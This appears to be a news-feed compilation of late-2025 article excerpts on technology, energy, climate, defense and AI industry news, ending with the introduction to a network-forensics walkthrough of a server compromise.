
Elon Musk’s X first to be fined under EU’s Digital Services Act

5 December 2025 at 11:15

Elon Musk’s X became the first large online platform fined under the European Union’s Digital Services Act on Friday.

The European Commission announced that X would be fined nearly $140 million, with the potential to face “periodic penalty payments” if the platform fails to make corrections.

A third of the fine stems from one of the first moves Musk made after taking over Twitter. In November 2022, he ended the platform’s long-standing practice of using blue checkmarks to verify the identities of notable users and instead began selling them for about $8 per month, immediately prompting a wave of imposter accounts impersonating celebrities, officials, and brands.


Forget Stranger Things—this other Netflix sci-fi thriller is smarter and darker

4 December 2025 at 13:00

Even after some divided reviews of the first batch of its insanely anticipated fifth and final season, Netflix’s crown jewel, Stranger Things, is still a cultural phenomenon. The iconic thriller/sci-fi series’ latest season sits at around 90% on Rotten Tomatoes. For fans who’ve been along for the ride since 2016, its mix of big coming-of-age emotions and even bigger monsters, all dripping with '80s nostalgia, is like comfort viewing at this point.

In 1995, a Netscape employee wrote a hack in 10 days that now runs the Internet

4 December 2025 at 12:59

Thirty years ago today, Netscape Communications and Sun Microsystems issued a joint press release announcing JavaScript, an object scripting language designed for creating interactive web applications. The language emerged from a frantic 10-day sprint at pioneering browser company Netscape, where engineer Brendan Eich hacked together a working internal prototype during May 1995.

While the JavaScript language didn’t ship publicly until that September and didn’t reach a 1.0 release until March 1996, the descendants of Eich’s initial 10-day hack now run on approximately 98.9 percent of all websites with client-side code, making JavaScript the dominant programming language of the web. It’s wildly popular; beyond the browser, JavaScript powers server backends, mobile apps, desktop software, and even some embedded systems. According to several surveys, JavaScript consistently ranks among the most widely used programming languages in the world.

In crafting JavaScript, Netscape wanted a scripting language that could make webpages interactive, something lightweight that would appeal to web designers and non-professional programmers. Eich drew from several influences: The syntax looked like a trendy new programming language called Java to satisfy Netscape management, but its guts borrowed concepts from Scheme, a language Eich admired, and Self, which contributed JavaScript’s prototype-based object model.


Why the grid relies on nuclear reactors in the winter

4 December 2025 at 06:00

As many of us are ramping up with shopping, baking, and planning for the holiday season, nuclear power plants are also getting ready for one of their busiest seasons of the year.

Here in the US, nuclear reactors follow predictable seasonal trends. Summer and winter tend to see the highest electricity demand, so plant operators schedule maintenance and refueling for other parts of the year.

This scheduled regularity might seem mundane, but it’s quite the feat that operational reactors are as reliable and predictable as they are. It leaves some big shoes to fill for next-generation technology hoping to join the fleet in the next few years.

Generally, nuclear reactors operate at constant levels, as close to full capacity as possible. In 2024, for commercial reactors worldwide, the average capacity factor—the ratio of actual energy output to the theoretical maximum—was 83%. North America rang in at an average of about 90%.

(I’ll note here that it’s not always fair to just look at this number to compare different kinds of power plants—natural-gas plants can have lower capacity factors, but it’s mostly because they’re more likely to be intentionally turned on and off to help meet uneven demand.)

Those high capacity factors also undersell the fleet’s true reliability—a lot of the downtime is scheduled. Reactors need to refuel every 18 to 24 months, and operators tend to schedule those outages for the spring and fall, when electricity demand isn’t as high as when we’re all running our air conditioners or heaters at full tilt.

Take a look at this chart of nuclear outages from the US Energy Information Administration. There are some days, especially at the height of summer, when outages are low and nearly all commercial reactors in the US are operating at close to full capacity. On July 28 of this year, the fleet was operating at 99.6%. Compare that with the 77.6% of capacity on October 18, as reactors were taken offline for refueling and maintenance. Now we’re heading into another busy season, as reactors come back online and outages approach another low point.

That’s not to say all outages are planned. At the Sequoyah nuclear power plant in Tennessee, a generator failure in July 2024 took one of two reactors offline, an outage that lasted nearly a year. (The utility also did some maintenance during that time to extend the life of the plant.) Then, just days after that reactor started back up, the entire plant had to shut down because of low water levels.

And who can forget the incident earlier this year when jellyfish wreaked havoc on not one but two nuclear power plants in France? In the second instance, the squishy creatures got into the filters of equipment that sucks water out of the English Channel for cooling at the Paluel nuclear plant. They forced the plant to cut output by nearly half, though it was restored within days.

Barring jellyfish disasters and occasional maintenance, the global nuclear fleet operates quite reliably. That wasn’t always the case, though. In the 1970s, reactors operated at an average capacity factor of just 60%. They were shut down nearly as often as they were running.

The fleet of reactors today has benefited from decades of experience. Now we’re seeing a growing pool of companies aiming to bring new technologies to the nuclear industry.

Next-generation reactors that use new materials for fuel or cooling will be able to borrow some lessons from the existing fleet, but they’ll also face novel challenges.

That could mean early demonstration reactors aren’t as reliable as the current commercial fleet at first. “First-of-a-kind nuclear, just like with any other first-of-a-kind technologies, is very challenging,” says Koroush Shirvan, a professor of nuclear science and engineering at MIT.

That means it will probably take time for molten-salt reactors, small modular reactors, or any of the other designs out there to overcome technical hurdles and settle into their own rhythm. It’s taken decades to get to a place where we take it for granted that the nuclear fleet can follow a neat seasonal curve based on electricity demand.

There will always be hurricanes and electrical failures and jellyfish invasions that cause some unexpected problems and force nuclear plants (or any power plants, for that matter) to shut down. But overall, the fleet today operates at an extremely high level of consistency. One of the major challenges ahead for next-generation technologies will be proving that they can do the same.

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

OpenAI CEO declares “code red” as Gemini gains 200 million users in 3 months

2 December 2025 at 17:42

The shoe is most certainly on the other foot. On Monday, OpenAI CEO Sam Altman reportedly declared a “code red” at the company to improve ChatGPT, delaying advertising plans and other products in the process,  The Information reported based on a leaked internal memo. The move follows Google’s release of its Gemini 3 model last month, which has outperformed ChatGPT on some industry benchmark tests and sparked high-profile praise on social media.

In the memo, Altman wrote, “We are at a critical time for ChatGPT.” The company will push back work on advertising integration, AI agents for health and shopping, and a personal assistant feature called Pulse. Altman encouraged temporary team transfers and established daily calls for employees responsible for enhancing the chatbot.

The directive creates an odd symmetry with events from December 2022, when Google management declared its own “code red” internal emergency after ChatGPT launched and rapidly gained in popularity. At the time, Google CEO Sundar Pichai reassigned teams across the company to develop AI prototypes and products to compete with OpenAI’s chatbot. Now, three years later, the AI industry is in a very different place.


This GivingTuesday, one campaign aims to turn generosity into a lifeline for military families

2 December 2025 at 12:21

Interview transcript:

Terry Gerton: It is GivingTuesday and so I’m delighted to start this story with Navy-Marine Corps Relief Society. But as we sit here today, coming off of the longest shutdown in government history, walk us through how military families are doing right now. How did that shutdown affect them?

Robert Ruark: That’s an absolutely great question. I think the way military families feel is that it can certainly affect their confidence in the support of their families. And the big thing is that if their pay is uncertain, then it is absolutely necessary that they have a backstop for that. So one of the things that’s come up with a lot of the banks that cater to the military is the Payroll Protection Plan, the PPP. The banks like USAA, Navy Federal Credit Union, PenFed, PenAir, a lot of the ones that cater to the military, they have those. You’ve got to get signed up for that if you’re an active duty service member, because they can guarantee a great part of that payday. But if you’re not, you talk about stress. I mean, there’s enough stress in military life between inflation, global conflict potential, unplanned deployments that are going on quite a bit right now, housing and gas prices and basic life events that happen to your families, especially when you’re raising a young family with children at a military base and you’re forced to relocate and deploy all the time, your spouse is trying to find work and it’s really difficult to do that. So to not pay a service member, in my opinion, is a sin, because of what they do for this nation, because they’re not necessarily doing it for themselves. They’re doing it because they want to be part of something much bigger, and that’s the country and the country that they love. There’s a very mutual relationship there. So you want that confidence. You don’t ever want to lose that confidence. So I think pay has to be there. We were taught when I was a young Marine: pay, mail and food. Pay, mail and chow is what we call it, but you need those three things. Those are rights. And so I think every military service member views it as a right to be paid on time.

Terry Gerton: People who aren’t familiar or haven’t lived a military lifestyle may not understand all of the things that you just walked us through. And that’s, I think, what makes this GivingTuesday campaign so interesting. Navy-Marine Corps Relief Society has partnered for the fourth year in a row with the other military aid societies for GivingTuesday. Tell us about that partnership and what it means for military families who may be facing some of the stresses you just described.

Robert Ruark: I think the best part about the partnership is, as everyone in the country who follows the armed forces knows, we consider ourselves a joint force. And so that should also apply to the military nonprofits. Unfortunately, most of our nonprofit peers outside the military aren’t really partnered with a lot of people. There are maybe a few exceptions, of course, but the bottom line is we thought we would do something about four years ago that would be really new. And so we decided to partner to benefit all of us, because we fight together and we train together in a joint environment. So we decided that on GivingTuesday, for the last few years, the four military aid societies, the Army Emergency Relief, Air Force Aid Society, Coast Guard Mutual Assistance and Navy-Marine Corps Relief Society, would join forces to raise important funds to support military families in need through a different campaign each year. This year’s campaign is ‘Make Giving Your Superpower.’

Terry Gerton: Tell us about that campaign theme and why you chose it.

Robert Ruark: So the campaign is being conducted today on social media with the one-day goal to provide active duty service members and family members with vital emergency relief, financial support and education assistance. Those are the three things that we all have in common that we do to support everybody.

Terry Gerton: And how do you hope folks resonate with that superpower theme?

Robert Ruark: Well, the theme is a challenge to Americans to step up, suit up and make giving your superpower for the heroes who serve this country every day. All the donors need to do is visit the website missiongive.us. We believe our service members are truly superhuman in many ways and this is one way to honor their service. And the money goes straight to those different ways that we all support them. Financial assistance, education assistance, disaster assistance. And it goes primarily to those junior service members, the E-5s and below, with probably about five years or less service and a lot of them are married, they don’t make a lot of money and they’re looking to really improve their lives.

Terry Gerton: I’m speaking with retired Marine Corps Lt. Gen. Bob Ruark. He’s the president and CEO of the Navy-Marine Corps Relief Society. So something that’s really interesting with your campaign this year, you have a major matching gift partner. Tell us about Lockheed Martin’s role in this year’s campaign.

Robert Ruark: Lockheed Martin is, of course, the global aerospace and defense company. About three years ago, they started the $1 million match for all contributions, doubling the impact. That made this not only a competition, but a wonderful thing that very few nonprofits have. And so last year, we raised $1.3 million, which clearly doubled the impact. And so visiting missiongive.us is really what we ask, but that money will go right back out to the troops, especially those that are deployed and the families that are behind, and help them with a lot of their needs. For example, financial assistance is our biggest need. And right now, the Navy-Marine Corps Relief Society alone, we do $50 million of financial assistance a year, interest-free loans and grants, and we sit and we do budgets. We do financial education. We do everything we can to help them basically make the dollars go as far as they can.

Terry Gerton: But if someone wants to go beyond giving on GivingTuesday and get involved, what are the opportunities and how might someone become a volunteer with you?

Robert Ruark: Well, there are enormous opportunities. They can visit one of our offices at one of those 52 major Navy and Marine Corps bases. They can go to nmcrs.org. They can call us. They can email us. We will always accept volunteers. And the best part is that volunteers, in a lot of cases, get some great training. They become caseworkers in financial situations. They can get retail experience in our thrift shops. They can assist the visiting nurse program, which is in such demand that we make 12,000 patient contacts each year, and they can learn budgeting and be able to do that financial education. So there are enormous opportunities to grow, and we know military spouse unemployment is a huge issue. They can get some skills and then hopefully apply those to a real job.

Terry Gerton: Do your volunteers have to be connected to the military or can they be real-life civilians?

Robert Ruark: They can be real-life civilians. It is so easy.

Terry Gerton: Well, give us the website one more time.

Robert Ruark: Ours is nmcrs.org, and the GivingTuesday website to give to all of us and choose your favorite military aid society is missiongive.us, and please thank Lockheed Martin in some way, shape or form, because they’re making it happen with a million-dollar match.


Reintroduced carnivores’ impacts on ecosystems are still coming into focus

28 November 2025 at 07:15

When the US Fish and Wildlife Service reintroduced 14 gray wolves to Yellowstone National Park in 1995, the animals were, in some ways, stepping into a new world.

After humans hunted wolves to near-extinction across the Western US in the early 20th century, the carnivore’s absence likely altered ecosystems and food webs across the Rocky Mountains. Once wolves were reintroduced to the landscape, scientists hoped to learn if, and how quickly, these changes could be reversed.

Despite studies claiming to show early evidence of a tantalizing relationship between wolves and regenerating riparian ecosystems since the canines returned to Yellowstone, scientists are still debating how large carnivores impact vegetation and other animals, according to a new paper published this month.


Germany unveils long-endurance Greyshark underwater drones

27 November 2025 at 10:40
EUROATLAS, the German advanced defense technologies company, has announced the launch of its new GREYSHARK family of autonomous underwater vehicles, introducing two multi-mission platforms designed for long-range underwater intelligence, surveillance, and reconnaissance. The company says the new Bravo and Foxtrot AUVs will provide militaries and critical-infrastructure operators with persistent underwater awareness at a time when […]

Danish Terma expands C-UAS portfolio with UK’s OSL acquisition

27 November 2025 at 10:35
Terma A/S announced on November 27, 2025, that it has completed the acquisition of OSL Technology, a UK company known for counter-drone and intelligent security systems. According to the company, the move strengthens its strategy to expand market-ready Counter-Unmanned Aircraft Systems and critical-infrastructure protection solutions. OSL is a UK specialist with long-running experience in civil […]

This year’s UN climate talks avoided fossil fuels, again

27 November 2025 at 06:00

If we didn’t have pictures and videos, I almost wouldn’t believe the imagery that came out of this year’s UN climate talks.

Over the past few weeks in Belem, Brazil, attendees dealt with oppressive heat and flooding, and at one point a literal fire broke out, delaying negotiations. The symbolism was almost too much to bear.

While many, including the president of Brazil, framed this year’s conference as one of action, the talks ended with a watered-down agreement. The final draft doesn’t even include the phrase “fossil fuels.”

As emissions and global temperatures reach record highs again this year, I’m left wondering: Why is it so hard to formally acknowledge what’s causing the problem?

This is the 30th time that leaders have gathered for the Conference of the Parties, or COP, an annual UN conference focused on climate change. COP30 also marks 10 years since the gathering that produced the Paris Agreement, in which world powers committed to limiting global warming to “well below” 2.0 °C above preindustrial levels, with a goal of staying below the 1.5 °C mark. (That’s 3.6 °F and 2.7 °F, respectively, for my fellow Americans.)

Before the conference kicked off this year, host country Brazil’s president, Luiz Inácio Lula da Silva, cast this as the “implementation COP” and called for negotiators to focus on action, and specifically to deliver a road map for a global transition away from fossil fuels.

The science is clear—burning fossil fuels emits greenhouse gases and drives climate change. Reports have shown that meeting the goal of limiting warming to 1.5 °C would require stopping new fossil-fuel exploration and development.

The problem is, “fossil fuels” might as well be a curse word at global climate negotiations. Two years ago, fights over how to address fossil fuels brought talks at COP28 to a standstill. (It’s worth noting that the conference was hosted in Dubai in the UAE, and its president was literally the head of the country’s national oil company.)

The agreement in Dubai ended up including a line that called on countries to transition away from fossil fuels in energy systems. It was short of what many advocates wanted, which was a more explicit call to phase out fossil fuels entirely. But it was still hailed as a win. As I wrote at the time: “The bar is truly on the floor.”

And yet this year, it seems we’ve dug into the basement.

At one point about 80 countries, a little under half of those present, demanded a concrete plan to move away from fossil fuels.

But oil producers like Saudi Arabia were insistent that fossil fuels not be singled out. Other countries, including some in Africa and Asia, also made a very fair point: Western nations like the US have burned the most fossil fuels and benefited from it economically. This contingent maintains that legacy polluters have a unique responsibility to finance the transition for less wealthy and developing nations rather than simply barring them from taking the same development route. 

The US, by the way, didn’t send a formal delegation to the talks, for the first time in 30 years. But the absence spoke volumes. In a statement to the New York Times that sidestepped the COP talks, White House spokesperson Taylor Rogers said that President Trump had “set a strong example for the rest of the world” by pursuing new fossil-fuel development.

To sum up: Some countries are economically dependent on fossil fuels, some don’t want to stop depending on fossil fuels without incentives from other countries, and the current US administration would rather keep using fossil fuels than switch to other energy sources. 

All those factors combined help explain why, in its final form, COP30’s agreement doesn’t name fossil fuels at all. Instead, there’s a vague line saying leaders should take into account the decisions made in Dubai, and an acknowledgement that the “global transition towards low greenhouse-gas emissions and climate-resilient development is irreversible and the trend of the future.”

Hopefully, that’s true. But it’s concerning that even on the world’s biggest stage, naming what we’re supposed to be transitioning away from and putting together any sort of plan to actually do it seems to be impossible.

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

Benchmarking Chinese CPUs

By: Lewin Day
26 November 2025 at 19:00

When it comes to PCs, Westerners are most familiar with x86/x64 processors from Intel and AMD, with Apple Silicon taking up a significant market share, too. However, in China, a relatively new CPU architecture is on the rise. A fabless semiconductor company called Loongson has been producing chips with its LoongArch architecture since 2021. These chips remain rare outside China, but some in the West have been benchmarking them.

[Daniel Lemire] has recently blogged about the performance of the Loongson 3A6000, which debuted in late 2023. The chip was put through a range of simple benchmarking tests involving float processing and string transcoding operations. [Daniel] compared it to the Intel Xeon Gold 6338 from 2021, noting the Intel chip performed better pretty much across the board. No surprise, given its higher clock speed. Meanwhile, the gang over at [Chips and Cheese] ran even more exhaustive tests on the same chip last year. The Loongson was put through typical tasks like compressing archives and encoding video. The outlet came to the conclusion that the chip was a little weaker than older CPUs like AMD’s Zen 2 line and Intel’s 10th-generation Core chips. It’s also limited as a four-core chip, compared to modern Intel and AMD lines that often start at six cores as a minimum.

If you find yourself interested in Loongson’s products, don’t get too excited. They’re not exactly easy to lay your hands on outside of China, and even the company’s own website is difficult to access from beyond those shores. You might try reaching out to Loongson-oriented online communities if you seek such hardware.

Different CPU architectures have perhaps never been more relevant, particularly as we see the x86 stalwarts doing battle with the rise of desktop and laptop ARM processors. If you’ve found something interesting regarding another obscure kind of CPU, don’t hesitate to let the tipsline know!

Three things to know about the future of electricity

20 November 2025 at 04:00

One of the dominant storylines I’ve been following through 2025 is electricity—where and how demand is going up, how much it costs, and how this all intersects with that topic everyone is talking about: AI.

Last week, the International Energy Agency released the latest version of the World Energy Outlook, the annual report that takes stock of the current state of global energy and looks toward the future. It contains some interesting insights and a few surprising figures about electricity, grids, and the state of climate change. So let’s dig into some numbers, shall we?

We’re in the age of electricity

Energy demand in general is going up around the world as populations increase and economies grow. But electricity is the star of the show, with demand projected to grow by 40% in the next 10 years.

China has accounted for the bulk of electricity growth for the past 10 years, and that’s going to continue. But emerging economies outside China will be a much bigger piece of the pie going forward. And while advanced economies, including the US and Europe, have seen flat demand in the past decade, the rise of AI and data centers will cause demand to climb there as well.

Air-conditioning is a major source of rising demand. Growing economies will give more people access to air-conditioning; income-driven AC growth will add about 330 gigawatts to global peak demand by 2035. Rising temperatures will tack on another 170 GW in that time. Together, that’s an increase of over 10% from 2024 levels.  

AI is a local story

This year, AI has been the story that none of us can get away from. One number that jumped out at me from this report: In 2025, investment in data centers is expected to top $580 billion. That’s more than the $540 billion spent on the global oil supply. 

It’s no wonder, then, that the energy demands of AI are in the spotlight. One key takeaway is that these demands are vastly different in different parts of the world.

Data centers still make up less than 10% of the projected increase in total electricity demand between now and 2035. It’s not nothing, but it’s far outweighed by sectors like industry and appliances, including air conditioners. Even electric vehicles will add more demand to the grid than data centers.

But AI will be the dominant factor for the grid in some parts of the world. In the US, data centers will account for half the growth in total electricity demand between now and 2030.

And as we’ve covered in this newsletter before, data centers present a unique challenge, because they tend to be clustered together, so the demand tends to be concentrated around specific communities and on specific grids. Half the data center capacity that’s in the pipeline is close to large cities.

Look out for a coal crossover

As we ask more from our grid, the key factor that’s going to determine what all this means for climate change is what’s supplying the electricity we’re using.

As it stands, the world’s grids still primarily run on fossil fuels, so every bit of electricity growth comes with planet-warming greenhouse-gas emissions attached. That’s slowly changing, though.

Together, solar and wind were the leading source of electricity in the first half of this year, overtaking coal for the first time. Coal use could peak and begin to fall by the end of this decade.

Nuclear could play a role in replacing fossil fuels: After two decades of stagnation, the global nuclear fleet could increase by a third in the next 10 years. Solar is set to continue its meteoric rise, too. Of all the electricity demand growth we’re expecting in the next decade, 80% is in places with high-quality solar irradiation—meaning they’re good spots for solar power.

Ultimately, there are a lot of ways in which the world is moving in the right direction on energy. But we’re far from moving fast enough. Global emissions are, once again, going to hit a record high this year. To limit warming and prevent the worst effects of climate change, we need to remake our energy system, including electricity, and we need to do it faster. 

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

Kubernetes Cluster Goes Mobile in Pet Carrier

18 November 2025 at 22:00

There’s been a bit of a virtualization revolution going on for the last decade or so, where tools like Docker and LXC have made it possible to quickly deploy server applications without worrying much about dependency issues. Of course as these tools got adopted we needed more tools to scale them easily. Enter Kubernetes, a container orchestration platform that normally herds fleets of microservices in sprawling cloud architectures, but it turns out it’s perfectly happy running on a tiny computer stuffed in a cat carrier.

This was a build for the recent KubeCon in Atlanta, and the project’s creator [Justin] wanted it to have an AI angle, since the core compute in the backpack is an NVIDIA DGX Spark. When someone scans the QR code, the backpack takes a picture and then runs it through a two-node cluster on the Spark, where a local AI model stylizes the picture and sends it back to the user. Only the AI workload runs on the Spark; [Justin] uses a LattePanda to handle most of everything else.

To get power for the mobile cluster, [Justin] is using a small power bank, which gives around three hours of use before it needs to be recharged. The plan was originally to use the conference WiFi as well, but it proved unreliable, so he switched to a USB tether to his phone. It was a big hit with the conference goers, though, with people using it around every ten minutes while he had it on his back. Of course, you don’t need a fancy NVIDIA product to run a portable Kubernetes cluster. You can always use a few old phones to run one as well.

Google is still aiming for its “moonshot” 2030 energy goals

13 November 2025 at 06:00

Last week, we hosted EmTech MIT, MIT Technology Review’s annual flagship conference in Cambridge, Massachusetts. Over the course of three days of main-stage sessions, I learned about innovations in AI, biotech, and robotics. 

But as you might imagine, some of this climate reporter’s favorite moments came in the climate sessions. I was listening especially closely to my colleague James Temple’s discussion with Lucia Tian, head of advanced energy technologies at Google. 

They spoke about the tech giant’s growing energy demand and the sorts of technologies the company is looking to in order to help meet it. In case you weren’t able to join us, let’s dig into that session and consider how the company is thinking about energy in the face of AI’s rapid rise.

I’ve been closely following Google’s work in energy this year. Like the rest of the tech industry, the company is seeing ballooning electricity demand in its data centers. That could get in the way of a major goal that Google has been talking about for years. 

See, back in 2020, the company announced an ambitious target: by 2030, it aimed to run on carbon-free energy 24-7. Basically, that means Google would purchase enough renewable energy on the grids where it operates to meet its entire electricity demand, and the purchases would match up so the electricity would have to be generated when the company was actually using energy. (For more on the nuances of Big Tech’s renewable-energy pledges, check out James’s piece from last year.)

Google’s is an ambitious goal, and on stage, Tian said that the company is still aiming for it but acknowledged that it’s looking tough with the rise of AI. 

“It was always a moonshot,” she said. “It’s something very, very hard to achieve, and it’s only harder in the face of this growth. But our perspective is, if we don’t move in that direction, we’ll never get there.”

Google’s total electricity demand more than doubled from 2020 to 2024, according to its latest Environmental Report. As for that goal of 24-7 carbon-free energy? The company is basically treading water. While it was at 67% for its data centers in 2020, last year it came in at 66%. 

Not going backwards is something of an accomplishment, given the rapid growth in electricity demand. But it still leaves the company some distance away from its finish line.

To close the gap, Google has been signing what feels like constant deals in the energy space. Two recent announcements that Tian talked about on stage were a project involving carbon capture and storage at a natural-gas plant in Illinois and plans to reopen a shuttered nuclear power plant in Iowa. 

Let’s start with carbon capture. Google signed an agreement to purchase most of the electricity from a new natural-gas plant, which will capture and store about 90% of its carbon dioxide emissions. 

That announcement was controversial, with critics arguing that carbon capture keeps fossil-fuel infrastructure online longer and still releases greenhouse gases and other pollutants into the atmosphere. 

One question that James raised on stage: Why build a new natural-gas plant rather than add equipment to an already existing facility? Tacking on equipment to an operational plant would mean cutting emissions from the status quo, rather than adding entirely new fossil-fuel infrastructure. 

The company did consider many existing plants, Tian said. But, as she put it, “Retrofits aren’t going to make sense everywhere.” Space can be limited at existing plants, for example, and many may not have the right geology to store carbon dioxide underground. 

“We wanted to lead with a project that could prove this technology at scale,” Tian said. This site has an operational Class VI well, the type used for permanent sequestration, she added, and it also doesn’t require a big pipeline buildout. 

Tian also touched on the company’s recent announcement that it’s collaborating with NextEra Energy to reopen Duane Arnold Energy Center, a nuclear power plant in Iowa. The company will purchase electricity from that plant, which is scheduled to reopen in 2029. 

As I covered in a story earlier this year, Duane Arnold was basically the final option in the US for companies looking to reopen shuttered nuclear power plants. “Just a few years back, we were still closing down nuclear plants in this country,” Tian said on stage. 

While each reopening will look a little different, Tian highlighted the groups working to restart the Palisades plant in Michigan, which was the first reopening to be announced, last spring. “They’re the real heroes of the story,” she said.

I’m always interested to get a peek behind the curtain at how Big Tech is thinking about energy. I’m skeptical but certainly interested to see how Google’s, and the rest of the industry’s, goals shape up over the next few years. 

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

U.S. clears Denmark for $318M AIM-9X missile purchase

13 November 2025 at 03:45
A new United States authorization could further strengthen air-defense cooperation with a key NATO ally. On November 12, the State Department approved a possible Foreign Military Sale to Denmark involving AIM-9X Block II tactical missiles and related equipment, with an estimated value of $318.4 million. The Defense Security Cooperation Agency has delivered the required certification […]

Stop worrying about your AI footprint. Look at the big picture instead.

6 November 2025 at 06:00

Picture it: I’m minding my business at a party, parked by the snack table (of course). A friend of a friend wanders up, and we strike up a conversation. It quickly turns to work, and upon learning that I’m a climate technology reporter, my new acquaintance says something like: “Should I be using AI? I’ve heard it’s awful for the environment.” 

This actually happens pretty often now. Generally, I tell people not to worry—let a chatbot plan your vacation, suggest recipe ideas, or write you a poem if you want. 

That response might surprise some people, but I promise I’m not living under a rock, and I have seen all the concerning projections about how much electricity AI is using. Data centers could consume up to 945 terawatt-hours annually by 2030. (That’s roughly as much as Japan.) 

But I feel strongly about not putting the onus on individuals, partly because AI concerns remind me so much of another question: “What should I do to reduce my carbon footprint?” 

That one gets under my skin because of the context: BP helped popularize the concept of a carbon footprint in a marketing campaign in the early 2000s. That framing effectively shifts the burden of worrying about the environment from fossil-fuel companies to individuals. 

The reality is, no one person can address climate change alone: Our entire society is built around burning fossil fuels. To address climate change, we need political action and public support for researching and scaling up climate technology. We need companies to innovate and take decisive action to reduce greenhouse-gas emissions. Focusing too much on individuals is a distraction from the real solutions on the table. 

I see something similar today with AI. People are asking climate reporters at barbecues whether they should feel guilty about using chatbots too frequently when we need to focus on the bigger picture. 

Big tech companies are playing into this narrative by providing energy-use estimates for their products at the user level. A couple of recent reports put the electricity used to query a chatbot at about 0.3 watt-hours, the same as powering a microwave for about a second. That’s so small as to be virtually insignificant.

But stopping with the energy use of a single query obscures the full truth, which is that this industry is growing quickly, building energy-hungry infrastructure at a nearly incomprehensible scale to satisfy the AI appetites of society as a whole. Meta is currently building a data center in Louisiana with five gigawatts of computational power—about the same demand as the entire state of Maine at the summer peak.  (To learn more, read our Power Hungry series online.)

Increasingly, there’s no getting away from AI, and it’s not as simple as choosing to use or not use the technology. Your favorite search engine likely gives you an AI summary at the top of your search results. Your email provider’s suggested replies? Probably AI. Same for chatting with customer service while you’re shopping online. 

Just as with climate change, we need to look at this as a system rather than a series of individual choices. 

Massive tech companies using AI in their products should be disclosing their total energy and water use and going into detail about how they complete their calculations. Estimating the burden per query is a start, but we also deserve to see how these impacts add up for billions of users, and how that’s changing over time as companies (hopefully) make their products more efficient. Lawmakers should be mandating these disclosures, and we should be asking for them, too. 

That’s not to say there’s absolutely no individual action that you can take. Just as you could meaningfully reduce your individual greenhouse-gas emissions by taking fewer flights and eating less meat, there are some reasonable things that you can do to reduce your AI footprint. Generating videos tends to be especially energy-intensive, as does using reasoning models to engage with long prompts and produce long answers. Asking a chatbot to help plan your day, suggest fun activities to do with your family, or summarize a ridiculously long email has relatively minor impact. 

Ultimately, as long as you aren’t relentlessly churning out AI slop, you shouldn’t be too worried about your individual AI footprint. But we should all be keeping our eye on what this industry will mean for our grid, our society, and our planet. 

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

Four thoughts from Bill Gates on climate tech

30 October 2025 at 07:00

Bill Gates doesn’t shy away or pretend modesty when it comes to his stature in the climate world today. “Well, who’s the biggest funder of climate innovation companies?” he asked a handful of journalists at a media roundtable event last week. “If there’s someone else, I’ve never met them.”

The former Microsoft CEO has spent the last decade investing in climate technology through Breakthrough Energy, which he founded in 2015. Ahead of the UN climate meetings kicking off next week, Gates published a memo outlining what he thinks activists and negotiators should focus on and how he’s thinking about the state of climate tech right now. Let’s get into it. 

Are we too focused on near-term climate goals?

One of the central points Gates made in his new memo is that he thinks the world is too focused on near-term emissions goals and national emissions reporting.

So in parallel with the national accounting structure for emissions, Gates argues, we should have high-level climate discussions at events like the UN climate conference. Those discussions should take a global view on how to reduce emissions in key sectors like energy and heavy industry.

“The way everybody makes steel, it’s the same. The way everybody makes cement, it’s the same. The way we make fertilizer, it’s all the same,” he says.

As he noted in one recent essay for MIT Technology Review, he sees innovation as the key to cutting the cost of clean versions of energy, cement, vehicles, and so on. And once products get cheaper, they can see wider adoption.

What’s most likely to power our grid in the future?

“In the long run, probably either fission or fusion will be the cheapest way to make electricity,” he says. (It should be noted that, as with most climate technologies, Gates has investments in both fission and fusion companies through Breakthrough Energy Ventures, so he has a vested interest here.)

He acknowledges, though, that reactors likely won’t come online quickly enough to meet rising electricity demand in the US: “I wish I could deliver nuclear fusion, like, three years earlier than I can.”

He also spoke to China’s leadership in both nuclear fission and fusion energy. “The amount of money they’re putting [into] fusion is more than the rest of the world put together times two. I mean, it’s not guaranteed to work. But name your favorite fusion approach here in the US—there’s a Chinese project.”

Can carbon removal be part of the solution?

I had my colleague James Temple’s recent story on what’s next for carbon removal at the top of my mind, so I asked Gates if he saw carbon credits or carbon removal as part of the problematic near-term thinking he wrote about in the memo.

Gates buys offsets to cancel out his own personal emissions, to the tune of about $9 million a year, he said at the roundtable, but doesn’t expect many of those offsets to make a significant dent in climate progress on a broader scale: “That stuff, most of those technologies, are a complete dead end. They don’t get you cheap enough to be meaningful.

“Carbon sequestration at $400, $200, $100, can never be a meaningful part of this game. If you have a technology that starts at $400 and can get to $4, then hallelujah, let’s go. I haven’t seen that one. There are some now that look like they can get to $40 or $50, and that can play somewhat of a role.”

 Will AI be good news for innovation? 

During the discussion, I started a tally in the corner of my notebook, adding a tick every time Gates mentioned AI. Over the course of about an hour, I got to six tally marks, and I definitely missed making a few.

Gates acknowledged that AI is going to add electricity demand, a challenge for a US grid that hasn’t seen net demand go up for decades. But so too will electric cars and heat pumps. 

I was surprised at just how positively he spoke about AI’s potential, though:

“AI will accelerate every innovation pipeline you can name: cancer, Alzheimer’s, catalysts in material science, you name it. And we’re all trying to figure out what that means. That is the biggest change agent in the world today, moving at a pace that is very, very rapid … every breakthrough energy company will be able to move faster because of using those tools, some very dramatically.”

I’ll add that, as I’ve noted here before, I’m skeptical of big claims about AI’s potential to be a silver bullet across industries, including climate tech. (If you missed it, check out this story about AI and the grid from earlier this year.) 

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

Network Forensics: Analyzing a Server Compromise (CVE-2022-25237)

24 October 2025 at 10:34

Welcome back, aspiring forensic and incident response investigators.

Today we are going to learn more about a branch of digital forensics that focuses on networks: Network Forensics. This field often yields a wealth of valuable evidence. Even though skilled attackers may evade endpoint controls, it is much harder for them to hide from active network captures. Many of the attacker’s actions generate traffic that is recorded. Intrusion detection and prevention systems (IDS/IPS) can also surface malicious activity quickly, although not every organization deploys them. In this exercise you will see what can be extracted from IDS/IPS logs and a packet capture during a network forensic analysis.

The incident we will investigate today involved a credential-stuffing attempt followed by exploitation of CVE-2022-25237. The attacker abused an API to run commands and establish persistence. Below are the details and later a timeline of the attack.

Intro

